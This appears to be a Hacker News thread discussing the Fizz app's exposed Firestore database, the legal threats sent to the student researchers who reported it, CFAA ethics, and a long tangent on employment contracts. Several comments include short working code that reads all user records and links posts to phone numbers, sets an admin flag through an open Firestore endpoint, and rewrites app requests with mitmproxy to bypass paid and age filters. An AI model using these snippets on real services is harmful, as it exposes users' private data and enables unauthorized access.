Good analysis. One important caveat is that, while this may technically have been a CFAA violation, it's almost certainly not one the Department of Justice would prosecute.
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
> If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
I am extremely not a lawyer, but the pattern of legal posturing I've observed is that some lawyer makes grand over-reaching statements, and the opposing lawyer responds with their own grand over-reaching statements.
"My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
Yeah, Firebase makes this much more of a gray area than a SQL database would, where you'd know instantly as soon as you issued an INSERT or an UPDATE that you were doing something unauthorized. The writeup is solid, you seem like you took most of the normal precautions a professional team would. The story has the right ending!
Did you check with the target before you "checked whether we could set `isAdmin` to `true` on our existing accounts?"
If you did not get consent from a subject, you are not a researcher. If you see a door and check to see if it is unlocked without its owner authorizing you to do so, you are in the ethical territory of burglary even if you didn't burgle.
Helpfully the "technical writeup" post links to "industry best practices" [0] which include:
> If you are carrying out testing under a bug bounty or similar program, the organisation may have established safe harbor policies, that allow you to legally carry out testing, as long as you stay within the scope and rules of their program. Make sure that you read the scope carefully - stepping outside of the scope and rules may be a criminal offence.
The ethically poor behavior of Fizz doesn't mitigate your own.
I disagree with this take. There are certainly lines of what is and is not ethical behaviour (where they are is highly debatable), but the vendor doesn't have a monopoly on deciding that.
Yes i disagree. You are quoting the document out of context and it doesn't say what you are implying it says.
Maybe out of context is the wrong word. You quote enough of the paragraph it just doesn't support your point.
All the paragraph says is that one hypothetical situation may have legal consequences in some juridsictions. It does not make any claim as to whether or not that is ethical or right.
Ok, do you agree that they claimed the OWASP document supported their actions?
> Concerned about user privacy and security — and consistent with industry best practices [link to owasp] — we wrote a detailed email to the Fizz team [0]
Do you disagree that the OWASP page states the below?
> Researchers should:
> Ensure that any testing is legal and authorised.[1]
Ok, I can see how the OWASP document doesn’t use the words ethical, right, or wrong. Would you agree that the claim by saligrama.io that they were “consistent with best practices” (where best practices is a link to OWASP) is not true?
I can see an interpretation where they communicated in line with best practices even if they didn’t follow best practices in their actions before communicating.
I don't think you have the pattern of facts correct (unless you have access to more information than what is in the linked Stanford Daily article).
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
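To make "query the database directly" concrete, here's a minimal hypothetical sketch (the collection and field names are invented; it assumes the Firebase JS SDK and a Firestore project with no restrictive security rules configured):

    import { initializeApp } from "firebase/app";
    import { getFirestore, collection, getDocs } from "firebase/firestore";

    // Public client config (placeholders) -- the same values shipped to every user.
    const app = initializeApp({ apiKey: "<public key>", projectId: "<project-id>" });
    const db = getFirestore(app);

    // With no security rules in place, plain reads like these succeed for anyone.
    const users = await getDocs(collection(db, "users"));
    const posts = await getDocs(collection(db, "posts"));

    // Which is what makes posts linkable to identifying info like phone numbers.
    const contactByUid = new Map<string, string>();
    for (const u of users.docs) {
      contactByUid.set(u.id, u.data().phoneNumber);
    }
    for (const p of posts.docs) {
      console.log(p.data().text, "->", contactByUid.get(p.data().authorId));
    }

If that's roughly the fact pattern, it's reading data the server hands to any client that asks, rather than creating admin accounts.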
I think intent matters for actually securing an indictment and conviction. If, for example, they can prove that you exfiltrated their user data (this happened to Weev, who noticed an ordinal ID in a URL and enumerated all possible URLs), they could actually get the feds to bust you. But you're right, if they're big enough they could try to come after you regardless, at the risk of turning the security research community against them.
I'm not a lawyer, so I'm pretty sure what I'm about to say wouldn't hold up in a court of law, but if you claim your system is 100% secure, then someone hacks it, I think by definition you are allowed to be there and not subject to the CFAA. In a 100% secure system you can't get into anything you're not allowed to, so if you're accessing something, you are, by definition, allowed to.
We all here know there is no such thing as something 100% secure, but if you're gonna go making wild claims, you should have to stand by them.
To your point in #2: this can create a murky and risky situation for the party being reviewed. Particularly if you’re small and you are trying to land your first big client that asks questions like “have you previously been compromised?” then your answer now depends on the definition of compromised.
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
I don't understand why, in both contracts and legal communication (particularly threatening communication), there is little to no consequence for the writing party when they get things wrong.
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they face no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader (who tends to be the much weaker party) to know.
Same here. Why can a company send a threatening letter ("you'll go to federal prison for 20 years for this!!") when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequence beyond "oh, never mind"?
> I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
"Right-to-Work" refers to the inability of unions to negotiate closed shops, where all employees of that "shop" must be part of the union.
You're thinking of "At-Will" employment, which allows employees and employers to end an employment relationship at any time for any (except for the few illegal) reasons.
Right-to-work is about quashing union shops. You're thinking about "at-will" employment, which is the law of the land everywhere except Montana. But an employee contract overrides at-will employment: If your contract says your employer can't fire you, your employer can't fire you without being in breach of contract.
The employment of an individual that has an employment contract is governed by the strictest set of rules between the right-to-work state's laws and the employment contract. Literally every permissible provision of an employment contract can be a protection: golden parachutes, vacation days, sick days, payout of the same, IP guarantees for hobby work, employment benefits, etc.
Right to work at its most generic level means freedom from being forced into a union, not freedom from being held to a contract.
Nobody has these except top execs who are already in a huge position of power.
> vacation days, sick days, payout of the same
Nope, not anymore: nothing is guaranteed with “flexible time off”. I literally cannot meet my performance goal if I take more than 1 sick/vacation day PER YEAR. Yes, my raises are tied to this performance goal. Yes, it's probably illegal, but who cares? Nobody is ever going to do anything about it. This is every company with FTO. Who gets “paid out” for PTO anymore?
> IP guarantees for hobby work
You're joking, right? Most employment contracts claim that they own the slam poetry you write on your napkin at 2:00 am on a Saturday while high on your couch. Every mention of IP in an employment contract is as greedy as possible.
> employment benefits
Ok but in a right to work state these can be terminated any time anyway.
Literally nothing about an employment contract is ever written in favor of the actual employee. Of course it's not: they wrote it. If every company in an industry does this and they all refuse to negotiate, workers have no choice but to sign it. It's crazy to me to think that a U.S. company would voluntarily ever do anything in the interest of any of its employees, ever. This is the whole reason why ambiguities are supposed to go in favor of the party that didn't write it. Voiding any part of an employee contract can therefore only ever benefit the employee (except possibly the part where they get paid). If you want protections for employees, look to regulation and unions, not contracts written by the employer.
I don’t know what to say in response to your complaints except negotiate better working conditions next time you get hired. The company wrote it. You accepted it. You can always ask for different terms and walk away if they don’t agree, start your own company, or change industries to one where companies are willing to negotiate.
If you want protections for employees, sure you can (erroneously, in my opinion) look to unions. If you want protections for yourself, look to negotiate.
> You can always ask for different terms and walk away if they don’t agree, start your own company, or change industries to one where companies are willing to negotiate.
I suspect you have lived a very privileged life if you really believe these options are actually open to most employees in the U.S. Switch industries? Start your own company? Those are both extreme life-altering multi-year responses to losing PTO payout, and only work for people who have major safety nets and support in their lives. Companies pull this bullshit because they know they can get away with it. Guess what: they're right. I'm glad you are in such a state of privilege that you can spend 4 years going back to college and switching industries without going into massive debt and without suffering from the loss of income during that time, but you are extremely lucky to be in that position. Do not assume others are lazy and/or stupid and/or bad negotiators because they can't. Negotiating is not about shaking hands harder, it's about having leverage, and 98% of U.S. workers have none.
> negotiate better working conditions next time you get hired
These were not the working conditions at the time I was hired. None of this was in any contract I signed. Companies change this stuff after-the-fact all the time. What are you going to do, hire an employment lawyer? You'd poison your own drinking well, potentially forever, with the possible upside of being the only employee in your company that actually gets PTO paid out? Come on. Nobody is doing this. Companies pull this bullshit because they can.
I grew up what you’d call “lower middle class.” Your suspicions are incorrect. I’ve switched industries twice in my life to the tune of nearly a third of a million in student loan debt. I know how difficult it is and how expensive it is, but the actual strength of some people’s personal convictions matches the strength of the convictions you pretend to have online. Just like you, the companies I worked at (and owned a portion of) changed or the industries I worked in changed, but unlike you I left (and forced them to cash out my PTO because, contrary to what you think, you do have an enforceable employment contract even if it’s in the form of a benefits package, an employee handbook, or even just “that’s what the company normally does” at that point in time) after realizing that the change was permanent rather than taking to the internet to complain while continuing to pull an easy paycheck.
It’s strange that the people who tell you how difficult something is are almost always people who haven’t done it and the people who tell you how privileged you are almost always are even more so themselves. Tell me, when’s the last time you swung a hammer or pulled unemployment benefits?
> I’ve switched industries twice in my life to the tune of nearly a third a million in student loan debt.
And you're actually suggesting this as a solution to others? That they lose years of income and take on $300k in non-dischargeable debt because their employer acted like a dick, in the vain hope that with this new degree, their new employers won't? Sorry, but "just spend years and take on $300k in student loan debt like I did" is just not compelling advice.
> the actual strength of some people’s personal convictions matches the strength of the convictions you pretend to have online
You're significantly upping the "personal attack" game here. You could just as easily say that I am the one with strong convictions, continuing to work at a company that treats its employees like shit because I actually do believe in the work that I'm doing there.
> It’s strange that the people who tell you how difficult something is are almost always people who haven’t done it
It's strange to you that the people who claim something is difficult are the ones who haven't been able to do it?
> Tell me, when’s the last time you swung a hammer or pulled unemployment benefits?
Not interested in a hard-knocks pissing contest. I assumed you wouldn't spend $300k in a game of Musical Diplomas in the hope of avoiding being treated the way most people in the U.S. are treated by most companies unless you had a significant safety net. I'm not sure what you're trying to prove by saying: no, you added it onto an already difficult life. My point is that this is not good advice.
1. Someone asked what protections an employee could expect to receive from an employment contract in a right to work state.
2. I responded that right to work is not related to employment contracts but to unions and listed a number of protections and benefits regularly covered by employment contracts.
3. You came in saying that, anecdotally, the benefits are either non-existent in your industry or only available to top executives and ending with a sort of anti-“corporate overlord” conspiracy about how every term in an employment contract is a negative to an employee because the employer writes the contract.
4. I told you that contracts are bilateral and therefore you should negotiate, start your own business, or quit.
5. You responded with the first actual personal attack by stating that even suggesting that someone negotiate, start a business, or quit meant that I came from a life of luxury and privilege and how my supposed privilege blinds me to the cost of quitting an industry before again going on a rant based on your specific situation (that you refuse to leave) and generalizing your refusal to negotiate, start your own business, or leave to “nobody” negotiating, starting their own company, or leaving.
6. I responded to your personal attack by noting that I don’t come from privilege, that I have changed industries, that it is possible to finance it via student loans, and that I have been in similar situations as you and taken a different path. I noted that some people’s actions match their espoused beliefs while noting that you don’t appear to be one of those people. I then made a snarky comment about how you seem to be the type to deem something hard before even trying it and to cry privilege while you stay at your cushy white collar job.
7. You responded shifting your argument from “nobody” does this to “nobody smart” (obviously, because you’re smart and you haven’t done it) does this (a strange argument on a website like HN given its relationship with startups…) and crying about personal attacks. Oh, and apparently you really love your job after all despite all the prior ranting about how much you hate your job. And apparently you don’t want to get into a who-has-privilege argument with me after all now that you know my background sort of undercuts your entire argument.
I will concede that "I suspect you have lived a very privileged life" was overly focused on you, and should have been something like "Nobody should seriously consider these options unless they are living a very privileged life". Your actual personal history is not relevant to my argument at all and I shouldn't have brought it up. I maintain that most employees have basically zero leverage to negotiate their worker-hostile contracts, and that it is not a good idea to saddle yourself with $300k of non-dischargeable student loan debt in order to try to avoid a practice that is pervasive in the U.S.
> anti-“corporate overlord” conspiracy
It's not exactly done in secret. Would you call a feudal serf a conspiracy theorist if he was ranting about how the Dukes and Kings hold all the power? I'm lucky that I have more leverage than an Amazon warehouse employee but it's awfully hard to compare their working conditions to Jeff Bezos's situation and not call him a "corporate overlord".
> Oh, and apparently you really love your job after all despite all the prior ranting about how much you hate your job.
This is just getting boring. Yes, I both love and hate my job. So?
> "Nobody should seriously consider these options unless they are living a very privileged life".
> I maintain that most employees have basically zero leverage to negotiate their worker-hostile contracts
He's trying to tell you from direct personal experience - as are many others in this thread - that it is not as dire as you're committed to believing, and that it is absolutely possible to negotiate terms at a non-executive level.
To put it differently: the corporate overlords have successfully convinced you that you have no power.
You're on a forum for tech workers and tech entrepreneurs. Going "you're privileged, gotcha!" doesn't hold much water when it's true of literally the entire target demographic. You are right, we are lucky: our industry is in demand, so don't squander it by pretending you're up against insurmountable odds at the negotiating table. All you're doing by rolling over for your employer is weakening everybody else's negotiating position.
If my employer wants to change the terms of my employment, I absolutely would make sure I actually agreed to the changes before doing anything else. If I didn't agree, I'd refuse to sign anything and leave the employer with the choice to either A) fire me (under the terms of the old contract), B) leave me with the old agreement, C) fire me under the new terms and get sued, or D) come back with a better offer.
This is tech. There's no shortage of jobs for people with any experience whatsoever. That's leverage in not getting railed in your employment terms.
Because for all the bullshit I have to put up with, and all the things I hate about management, and all the things that could easily be better but for one asshole vice-president needing to cosplay Business Hero ... for all of that, the job is deeply interesting and I learn a ton every day. And virtually every other job on the market is mind-numbingly boring and pointless.
And because I like my immediate teammates a lot.
And because the issues I'm railing against are incredibly pervasive in most companies in the United States and probably beyond. Our capitalism has been completely taken over by a caste of parasitic leeches who enshittify everything they touch and I am under no illusion that any other job would be any different.
But I do also look for other jobs regularly. Finding a job that is both interesting (<1%) and not full of shithead management (<5%) is about 1 in 2,000.
Employment contracts can govern firing. You can have a contract that says you can only be fired for cause and get one month of notice for other dismissals.
Actual employment contracts are rare in the US. I think that's because companies don't want the legal hassle for most employees, but executives and other important employees have contracts.
Other countries have contracts for every employee. I assume they use a standard contract for most employees, and that the laws limit the scope.
An employment contract is intended to backstop everything you were promised or negotiated during the hiring process. It doesn't really matter if you're in a right-to-work state or not, an employment contract provides you with recourse if the terms are not upheld by your employer. In the case of a breach, that is something you can remedy in court. (Whether or not it is worthwhile to pursue that legal case depends entirely on the context)
* anything you negotiated during hiring, like RSUs or sign-on bonuses
* stating your salary, benefits, and vacation is the basis for protecting you from theft of that compensation
* IP ownership clauses can protect your independent, off the clock work
* work location, if you are hired remote and then threatened with termination due to new RTO policies
I am just pulling general examples from the top of my head.
> "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse, as they have less access to high-powered legal authors? It also means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators - doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
Practical example: your employment agreement has a non-compete clause. If 3 years later non-competes are no longer allowed in employment contracts, you won’t want to be suddenly unemployed because your employment contract is no longer valid.
You’ll want the originally negotiated contract, minus the clause that can’t be enforced.
Thanks for the explanation and the term "severability". I understand its point now and it makes sense to have it conceptually. I also didn't know about this part:
> so long as it's not fundamentally a change to the contract's terms
However, taken down one notch from theoretical to more practical:
> It seems like you're arguing for some sort of punitive response to authoring a bad contract?
Not quite so bluntly, but yes. There's obviously a gray area here. So not for mistakes or subtle technicalities. But if one party is being intentionally or absurdly overreaching, then yes, I believe there should be some proportional punishment.
Particularly if the writing party's intent is more to scare the other side into inaction than a genuine belief that their wording is true.
The way I think of it is maybe in similar terms as disbarring or something like that. So not something that would be a day-to-day concern for honest people doing honest work, but some potential negative consequences if "you're taking it too far" (of course this last bit is completely handwavy).
Maybe such a mechanism exists that I'm not aware of.
I do like the idea theoretically as a deterrent against bad actors abusing the law to bully weaker parties - but the difficult part is in the details of implementation: how do you separate intent to abuse from incompetence?
Also confusing the mix here is who you are punishing when violations are found - is it the attorneys drafting the agreement? They're as likely to be unaffiliated with the company executing the contract as not, not everyone bothers with in-house counsel. Is it the company leadership forwarding the contract?
What's the scope of the punishment? An embargo on all new legal agreements for a period of time, or only with the parties to the bad contract? A requirement for change in legal representation? Now we get into overreach questions on the punishment side.
All of that to say I am guessing the reason something like this doesn't exist yet afaik is because it's a logistical nightmare to actually put into practice.
The closest I can think of to something that might work is like a credit score/rating for companies for "contract integrity" or something that goes down with negative rulings - but what 3rd party would own that? Even just the thought experiment spawns too many subqueries to resolve simply.
None of that contradicts the fact it's a good idea - just not sure if even possible to bring to life!
I'm reminded of the concept of a "tact filter", which is basically "do you alter what you say to avoid causing offense, or do you alter what you hear to avoid taking offense?"
The part the original essay leaves out is that optimal behavior depends on the scale and persistence of the relationship. In personal, 1:1, long-term relationships, you should apply outgoing tact filters because if you cause offense you've torched the relationship permanently and will suffer long-term consequences from it. But in public discourse, many-to-many, transactional relationships, it's better to apply incoming tact filters because there are so many people you interact with that invariably there will be someone who forgot to set their outgoing tact filter. (And in public discourse where you have longstanding relationships with your customers with serious negative consequences for pissing them off, you want to be very, very careful what you say. The entire field of PR is devoted to this.)
So anyone who spends a significant amount of time with the general public basically needs to develop a translation layer. "i hope you hang yourself" on an Internet forum becomes "somebody had a bad day and is letting off steam by trolling." "Your business is probably in violation of federal labor laws because you haven't displayed these $400 posters we're trying to sell you" becomes "Better download some PDFs off the Department of Labor for free" [1]. "We're calling from XYZ Collection Agency about your debt" or "This is the Deputy Sheriffs office. You have a warrant out for your arrest for failing to appear for jury duty" or "This is the IRS calling requesting you pay back taxes in the amount of $X over the phone" = ignore them and hang up because it's a scam. "Continued involvement in Russia's internal affairs will lead to nuclear consequences" = Putin is feeling insecure with his base and needs to rattle some sabers to maintain support. "You are in violation of several state and federal laws facing up to 20 years in prison" = they want something from me, lawyer up and make sure we're not in violation and then let's negotiate.
There is obviously such a thing as going too far, but it's kind of hard to draw a clear line. In a good faith context, laws and precedents can change quickly, sometimes based on the whim of a judge, and there are many areas of law where there is no clear precedent or where guidance is fuzzy. In those cases, it's important to have severability so that entire contracts don't have to be renegotiated because one small clause didn't hold up in court.
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
"Legalese" can often be simplified, but concepts that are necessarily in law are often not widely known by lay people, and as such it's hard to avoid some terminology and reasoning that require a bit of legal training to understand.
But every subject and field has their own set of terminology. It's just like programming -- while we strive to make code easier to understand (eg. Python is better than assembler in this regard), there's still a necessary learning curve. Your question is almost like asking "why can't we just tell the computer what we want to do in plain English?"
Sometimes the legalese is actually comprehensible if you give it a bit of patience. Often, though, programmers like to make (wrong) assumptions about how the words are to be interpreted, and that's where most people trip up.
Without a common language with exact meaning for phrases that are accepted by both parties contracts would be impossible to enforce and become useless.
It's a balance between encouraging people to stand up for their rights on one hand and discouraging filing of frivolous lawsuits on the other. The American system is "everyone pays their own legal fees", which encourages injured parties to file. The U.K. on the other hand is a "loser pays both parties' legal fees" (generally), which discourages a lot of plaintiffs from filing, even when they have been significantly harmed.
There can be consequences, but you have to be able to demonstrate you have been harmed. So, in what way have you been harmed by such a threat, and what is just compensation? How much will it cost to hire a lawyer to sue for compensation, and what are your chances of success? These are the same kinds of questions the entity sending the threatening letter asked themselves as well. If you think it is unfair because they have more resources, well that is more of a general societal problem - if you have more money you have access to better justice in all forms.
I recently got supremely frustrated by this in civil litigation. The claimant kept filing absolute fictional nonsense with no justification, and I had to run around trying to prove these things were not the case and racking up legal fees the whole time. Apparently you can just say whatever you want.
That's not the language they use. It will be more like "your actions may violate (law ref) and if convicted, penalties may be up to 20 years in prison." And how do you keep people from saying that? It's basically a statement of fact. If you have a problem with this, then your issue is with Congress for writing such a vague law.
“[the security researchers] may be liable for fines, damages and each individual of the [security research] Group may be imprisoned… Criminal penalties under the CFAA can be up to 20 years depending on circumstances.”
“the Group’s actions are also a violation of Buzz’s Terms of Use and constitute a breach of contract, entitling Buzz to compensatory damages and damages for lost revenue.”
“the Group’s agreement to infiltrate Buzz’s network is also a separate offense of conspiracy, exposing the Group to even more significant criminal liability.”
Emphasis added. The language is quite a bit more forceful and threatening than you make it out to be. Given that they were issuing these threats as an ultimatum, a "keep quiet about this or else...", it was likely a violation of California State Bar's rules of professional conduct.
No, you are talking about criminal law. What OP is talking about is severability, which exists so that if a judge determines Clause X violates the law, they can still (attempt to) enforce the rest of the contract if X can be easily remedied. I.e. the contract says no lunch breaks but CalOSHA regulations say 30 minutes are required; the employee can't void the contract in its entirety, they just take the breaks and the contract is amended if the employer pushes it.
I disagree with OP - a judge can always choose to invalidate a contract, regardless of severability. It is in there for the convenience of the parties, and I've not heard of it being used in bad faith.
"That's not the language they used. They simply admired your place of business and reflected on what a shame it would be if a negative event happened to it. How would you keep people from saying that? It's basically a statement of fact..."
Because contract law mostly views things through the lens of property rights. Historically those with the most property get the most rights, so they're able to get away with imposing wildly asymmetrical terms on the implicit basis that society will collapse if they're not allowed to.
These guys (at least according to the angry letter) went beyond reasonable safe harbor for security researchers. They created admin accounts and accessed data. It's definitely not clearly false that there's liability here; it's probably actually true.
IANAL, but the letter is borderline extortion/blackmail. Threatening to report an illegal activity unless the alleged perpetrator does something to your advantage can be extortion/blackmail AFAIK.
I feel like this article reflects an overall positive change in the way disclosure is handled today. Back in the 90s this was the sort of thing every company did. Companies would threaten lawsuits, or disclosure in the first place seemed legally dubious. Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
Sure, you still get some of that today - an especially old-fashioned company, or in this case naive college students - but overall things have shifted quite dramatically in favor of disclosure. Dedicated middlemen who protect security researchers' identities, large enterprises encouraging and celebrating disclosure, six-figure bug bounties; even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant for the author to go through this, but it's a nice reminder that situations like this are now somewhat rare, whereas they used to be the norm (or worse).
The problem is that it is still entirely illegal to do this kind of hacking without any permission.
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact that in the actual courts you are guilty of a crime.
Yeah, when it comes to cyber-security, we put our national security at risk so companies can avoid being embarrassed. (See my rant in another comment.)
As much as I hate using regulation as a hammer to fix things, if we did make software companies legally required to meet a level of security, then violations found by vulnerability testing like this could be prosecuted similar to SEC or OSHA violations, and it would work quite nicely.
Protecting white-hat hackers could be seen as a reduction in "regulation", since it permits the good guys to do good things. It allows people to do more, but some people will no longer be legally shielded from embarrassment and accountability.
In the current status quo, everyone except the good guys gets free rein: companies can stop legal scrutiny of their security, black-hats run wild and answer to no one, and the white-hats wring their hands "please sir, may I check for myself that the services I depend on are secure?" to which the companies respond "ha ha, no, but trust us, it's secure."
I wonder if this was the students' attempt to protect their future careers as much as anything—"keep quiet about this or else"—especially given the issues were quickly fixed. In that sense it differs from the classic 90s era retaliation. From the students' POV it was probably quite terrifying. I wouldn't discount intervention by wealthy parents either, but of course I know nothing of the situation or the people involved.
Crazy story. The Stanford daily article has copies of the lawyer letters back and forth, they are intense - and we wouldn't be able to read them if the EFF didn't step up.
The Stanford Daily article says “At the time, Fizz used Google’s Firestore database product to store data including user information and posts...Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly...phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information....Moreover, the database was entirely editable — it was possible for anyone to edit posts, karma values, moderator status, and so on."
This is unfortunately a very common issue with Firebase apps. Since the client is writing directly to the database, usually authorization is forgotten and the client is trusted to only write to their own objects.
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
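For anyone wondering how low the bar is: with dev-mode rules, a write like that doesn't even need the SDK; the public Firestore REST endpoint will take it. A rough sketch of the failure mode, not anything the researchers in TFA necessarily did - project ID, document path, and field name are all made up, and depending on the project you may also need the web API key that ships in the client bundle:

```python
# Sketch of an unauthenticated Firestore write against dev-mode ("open") rules,
# via the public REST API. All identifiers below are hypothetical.
import requests

PROJECT_ID = "example-scooter-app"   # assumption: found in the app's client config
DOC_PATH = "users/some-user-id"      # assumption: any document the rules fail to protect

url = (f"https://firestore.googleapis.com/v1/projects/{PROJECT_ID}"
       f"/databases/(default)/documents/{DOC_PATH}")

# updateMask limits the PATCH to one field; if the security rules allow it,
# this flips an "isAdmin" flag with no authentication at all.
resp = requests.patch(
    url,
    params={"updateMask.fieldPaths": "isAdmin"},
    json={"fields": {"isAdmin": {"booleanValue": True}}},
)
print(resp.status_code, resp.text)
```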
One interesting thing about the statute of limitations is “the discovery rule.”
For example, say the statute of limitations for 18 USC 1030 is two years. If a person hypothetically stole a scooter by hacking, two years later, they would be in the clear, right?
No. The discovery rule says that if a damaged party, for good reason, does not immediately discover their loss, the statutes of limitations is paused until they do.
Accordingly, if the scooter company read a post today about a hack that happened “a long time ago” and therein discovered their loss, the statute of limitations would begin to tick today and the hacker could be in legal jeopardy for two more years.
Also there are subtle questions around what discovery means here. Usually it is some sort of "could be discovered with reasonable effort". If I had proof of your wrongdoing in a letter sent to me, I am unlikely to get away with saying, "Oh, I didn't read the letter when I got it." If that proof was buried in a computer file with a million pages, I probably can reasonably say, "That was a needle in a haystack, and I didn't even know what to look for." For situations between those extremes, there will be case law that likely varies by state.
Huge arrow pointing to “varies by state” on all of this.
1030 (which is, of course, federal law) actually has a specific discovery/statute of limitations in the text of the statute, and so may not be affected by state discovery rule law.
It is common. But before you curse at Google here: this is VERY well documented. When you create a database, the UI screams at you that it's in dev mode, that security has not been set up, etc. If you keep ignoring it, the database will eventually close itself down automatically.
Which is why I hate that people keep claiming that you don't need to know what you are doing, nor employ anyone who knows what they are doing, to set up infrastructure. You might be able to stand things up without knowing what you are doing, but you probably shouldn't be running it in production that way.
If I recall correctly, you can set your firebase rules such that a user can only read/write/delete certain collections based on conditions such as if
user.email == collection.email.
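Something along those lines, yes. A minimal sketch in Firestore's rules language (collection and field names here are made up, and for document creation you'd compare against request.resource.data instead of resource.data):

```
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // Hypothetical collection: only the signed-in owner of a profile
    // document may read or write it.
    match /profiles/{profileId} {
      allow read, write: if request.auth != null
                         && request.auth.token.email == resource.data.email;
    }
  }
}
```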
A few years ago I found that HelloTalk (a language-learning pen-pal app) stored the actual GPS coordinates of users in a SQLite database that you can find in your iOS backup. The maps in-app showed only a general location (the pin disappeared at a certain zoom level).
You could also bypass the filter preventing searching for over-18 users if you are under 18 (and vice versa), and paid-only filters like location, gender, etc., by rewriting the requests with mitmproxy (paid status is not checked server-side).
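To illustrate the kind of rewrite I mean, here's a hypothetical mitmproxy addon that flips a client-side "paid features" flag before the request reaches the server. The host, path, and field name are all invented for illustration; none of this helps if the server actually re-checks entitlements.

```python
# Hypothetical mitmproxy addon: rewrite outgoing search requests so that a
# client-enforced "paid filters" flag is always enabled.
import json
from mitmproxy import http

TARGET_HOST = "api.example-app.com"  # assumption: the app's API host

def request(flow: http.HTTPFlow) -> None:
    if flow.request.pretty_host != TARGET_HOST:
        return
    if flow.request.method == "POST" and flow.request.path.startswith("/v1/search"):
        body = json.loads(flow.request.get_text() or "{}")
        # Only works because (per the comment above) paid status is not
        # validated server-side.
        body["paidFiltersEnabled"] = True
        flow.request.set_text(json.dumps(body))
```

Run it with `mitmproxy -s rewrite.py` and point the phone's proxy at the machine running it.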
Speaking of, are there tools to audit/explore firebase/firestore databases i.e. see if collections/documents are readable?
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
